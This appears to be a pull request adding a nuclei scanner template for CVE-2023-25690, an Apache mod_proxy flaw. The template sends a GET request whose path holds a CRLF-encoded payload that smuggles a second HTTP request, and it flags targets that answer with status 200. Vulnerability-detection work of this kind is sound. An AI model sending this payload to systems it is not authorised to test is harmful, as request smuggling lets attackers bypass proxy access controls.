### PR TITLE
Added CVE-2023-25690

### DIFF
--- a/http/cves/2023/CVE-2023-25690.yaml
+++ b/http/cves/2023/CVE-2023-25690.yaml
@@ -8,7 +8,7 @@ info:
   reference:
     - https://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL
     - https://github.com/dhmosfunk/CVE-2023-25690-POC
-  tags: crlf,generic,hackerone
+  tags: crlf,generic,apache
   metadata:
     max-request: 1
 

--- a/http/cves/2023/CVE-2023-25690.yaml
+++ b/http/cves/2023/CVE-2023-25690.yaml
@@ -1,0 +1,24 @@
+id: CVE-2023-25690
+
+info:
+  name: Apache mod_proxy CRLF
+  author: zM
+  severity: high
+  description: mod_proxy variable substitution does not strip CRLF
+  reference:
+    - https://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL
+    - https://github.com/dhmosfunk/CVE-2023-25690-POC
+  tags: crlf,generic,hackerone
+  metadata:
+    max-request: 1
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/"
+
+    stop-at-first-match: true
+    matchers:
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
### Template / PR Information

Simple check for CVE-2023-25690, based on the fact that a 400 error seem to be issued whenever the URL is not vulnerable.

- Added CVE-2023-25690
- References:
  - https://github.com/tbachvarova/linux-apache-fix-mod_rewrite-spaceInURL
  - https://github.com/dhmosfunk/CVE-2023-25690-POC

### Template Validation

I've validated this template locally?
- [X] YES (with [dhmosfunk](https://github.com/dhmosfunk/CVE-2023-25690-POC)'s lab)
- [ ] NO


#### Additional Details
<img width="754" alt="image" src="https://github.com/projectdiscovery/nuclei-templates/assets/3920186/979d6e40-828b-4641-8b73-6dbb64bf0e44">